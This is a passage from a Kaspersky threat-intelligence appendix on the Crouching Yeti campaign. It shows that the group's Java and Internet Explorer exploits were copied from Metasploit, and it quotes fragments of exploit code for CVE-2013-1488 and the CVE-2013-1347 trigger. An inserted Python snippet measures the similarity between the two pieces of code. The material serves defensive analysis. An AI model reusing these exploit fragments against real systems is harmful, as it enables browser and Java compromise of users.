Kaspersky_Lab_crouching_yeti_appendixes_eng_final
10.3. Obvious Metasploit Rips

The Yeti exploits are ripped line-for-line from the Metasploit Framework.
For example, class files served from www.nahoonservices.com/wp-content/plugins/rss-poster/start.jar include code pulled from the MSF. From the Yeti LyvAGalW.class file:

System.out.println("Here we go...");
String s = "jdbc:msf:sql://127.0.0.1:8080/sample";
String s2 = "userid";
String s3 = "password";
java.sql.Connection connection = DriverManager.getConnection(s, s2, s3);

For comparison, here is the Java exploit code from the Metasploit Framework, github.com/rapid7/metasploit-framework/blob/master/external/source/exploits/cve-2013-1488/Exploit.java:

System.out.println("Here we go...");
String url = "jdbc:msf:sql://127.0.0.1:8080/sample";
String userid = "userid";
String password = "password";
Connection con = DriverManager.getConnection(url, userid, password);
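
The side-by-side comparison above can be run mechanically. The following Python example is added here and is not code from the report or from Metasploit: it tokenises the two Java snippets quoted above, strips package qualifiers and renames declared locals by order of declaration, so renamed identifiers (s, s2, s3) no longer mask the copy. The function names and the UNRELATED control sample are constructed for illustration.

```python
import re
from difflib import SequenceMatcher

# The two Java snippets quoted above (typographic quotes replaced with ASCII).
YETI = '''System.out.println("Here we go...");
String s = "jdbc:msf:sql://127.0.0.1:8080/sample";
String s2 = "userid";
String s3 = "password";
java.sql.Connection connection = DriverManager.getConnection(s, s2, s3);'''
MSF = '''System.out.println("Here we go...");
String url = "jdbc:msf:sql://127.0.0.1:8080/sample";
String userid = "userid";
String password = "password";
Connection con = DriverManager.getConnection(url, userid, password);'''
# Constructed control sample: unrelated JDBC code, not taken from the report.
UNRELATED = '''Properties p = new Properties();
p.load(new FileInputStream("db.properties"));
Connection c = DriverManager.getConnection(p.getProperty("url"), p);'''

# One token per string literal, (possibly dotted) name, number or symbol.
TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*|\d+|\S')
NAME = re.compile(r'[A-Za-z_$][\w$.]*$')

def normalise(src):
    """Tokenise, strip package qualifiers, and alpha-rename declared locals."""
    # java.sql.Connection -> Connection; System.out.println is left alone.
    toks = [re.sub(r'^(?:[a-z][\w$]*\.)+(?=[A-Z])', '', t)
            for t in TOKEN.findall(src)]
    names = {}
    for typ, var, nxt in zip(toks, toks[1:], toks[2:]):
        # "Type name =" declares a local; number it by order of declaration.
        if NAME.match(typ) and NAME.match(var) and nxt == '=':
            names.setdefault(var, 'VAR%d' % len(names))
    return [names.get(t, t) for t in toks]

def similarity(a, b, normalised=True):
    """Token-sequence similarity in [0, 1] between two source fragments."""
    prep = normalise if normalised else TOKEN.findall
    return SequenceMatcher(None, prep(a), prep(b), autojunk=False).ratio()

if __name__ == '__main__':
    print('raw        Yeti vs MSF:     %.2f' % similarity(YETI, MSF, False))
    print('normalised Yeti vs MSF:     %.2f' % similarity(YETI, MSF))
    print('normalised Yeti vs control: %.2f' % similarity(YETI, UNRELATED))
```

String literals are kept verbatim during normalisation, so the shared "Here we go..." marker and JDBC URL still count as evidence of copying.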

Yeti’s delivery of CVE-2013-1347 from nahoonservices.com/wp-content/plugins/rss-poster/negc.html displays much the same level of technical originality. From negc.html:

f0 = document.createElement('span');
document.body.appendChild(f0);
f1 = document.createElement('span');
document.body.appendChild(f1);
f2 = document.createElement('span');
document.body.appendChild(f2);
document.body.contentEditable="true";
f2.appendChild(document.createElement('datalist'));
f1.appendChild(document.createElement('span'));
f1.appendChild(document.createElement('table'));
try{
f0.offsetParent=null;
}catch(e) {
}
f2.innerHTML="";
TLP: Green<br />
For any inquiries, please contact intelreports@kaspersky.com